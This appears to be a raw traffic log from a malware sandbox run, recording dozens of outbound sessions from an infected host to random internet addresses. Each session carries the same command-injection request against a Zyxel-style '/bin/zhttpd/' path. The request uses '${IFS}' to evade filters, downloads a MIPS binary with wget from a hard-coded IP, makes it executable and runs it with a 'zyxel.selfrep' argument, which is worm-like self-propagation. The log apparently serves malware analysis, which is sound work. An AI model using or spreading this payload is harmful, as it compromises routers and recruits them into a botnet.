                                                Jan 12, 2024 18:24:26.614473104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2093192.168.2.135816879.175.52.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614522934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2094192.168.2.135344081.121.237.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614568949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2095192.168.2.133705013.45.71.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614603043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2096192.168.2.1359868217.145.136.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614634037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2097192.168.2.1343154208.203.42.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614687920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2098192.168.2.1350882145.131.161.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614728928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2099192.168.2.133663440.91.16.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614765882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2100192.168.2.1353026178.55.189.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614787102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2101192.168.2.135098291.165.254.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614823103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2102192.168.2.133609072.26.53.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614869118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2103192.168.2.1339396209.114.194.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614902020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2104192.168.2.1333574101.172.112.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614927053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2105192.168.2.1360744129.29.92.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614955902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2106192.168.2.1351024177.214.103.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.614999056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2107192.168.2.1351918178.122.183.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615052938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2108192.168.2.1337882202.254.238.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615077972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2109192.168.2.1332790148.199.176.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615137100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2110192.168.2.1338272166.24.7.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615173101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2111192.168.2.1354198211.194.55.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615206003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2112192.168.2.1353558144.63.3.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615256071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2113192.168.2.1337032131.255.233.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615289927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2114192.168.2.135310249.145.125.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615335941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2115192.168.2.135259287.101.178.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615360975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2116192.168.2.1337970147.151.40.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615425110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2117192.168.2.1348676145.231.135.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615449905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2118192.168.2.1348698137.8.52.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615492105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2119192.168.2.1344268168.125.146.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615528107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2120192.168.2.135641842.105.5.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615562916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2121192.168.2.136024484.32.36.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615573883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2122192.168.2.1352296140.5.38.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615608931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2123192.168.2.1342438112.219.150.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615658045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2124192.168.2.134389425.78.223.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615720987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2125192.168.2.135798288.171.84.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615756989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2126192.168.2.134517476.158.168.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615807056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2127192.168.2.1340892145.35.22.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615833044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2128192.168.2.1347814156.146.198.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615859985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2129192.168.2.1357360164.209.218.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615946054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2130192.168.2.134304873.64.34.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615957975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2131192.168.2.1345516200.91.163.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.615999937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2132192.168.2.134337454.44.61.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616034985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2133192.168.2.1332870105.196.4.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616085052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2134192.168.2.1344474211.49.47.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616112947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2135192.168.2.1337034131.219.76.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616167068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2136192.168.2.135344419.237.164.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616203070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2137192.168.2.133579614.56.41.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616255999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2138192.168.2.1335840161.177.42.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616286039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2139192.168.2.1354464142.99.18.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616328001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2140192.168.2.133315017.160.18.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616359949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2141192.168.2.1351916191.163.173.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616416931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2142192.168.2.133898614.173.115.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616449118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2143192.168.2.1338256197.220.165.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616499901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2144192.168.2.1337166121.119.75.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616527081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2145192.168.2.1358112102.203.185.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616581917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2146192.168.2.1349962129.227.129.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616619110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2147192.168.2.1334340173.7.43.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616648912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2148192.168.2.1334822221.105.70.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616677999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2149192.168.2.135319894.226.3.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616713047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2150192.168.2.1344728130.139.154.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616746902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2151192.168.2.1349118134.76.94.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616805077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2152192.168.2.1336806162.148.196.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616835117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2153192.168.2.134995499.212.184.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616890907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2154192.168.2.1356112168.115.9.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.616921902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2155192.168.2.1336670147.14.9.95443
                                                TimestampBytes transferredDirectionData
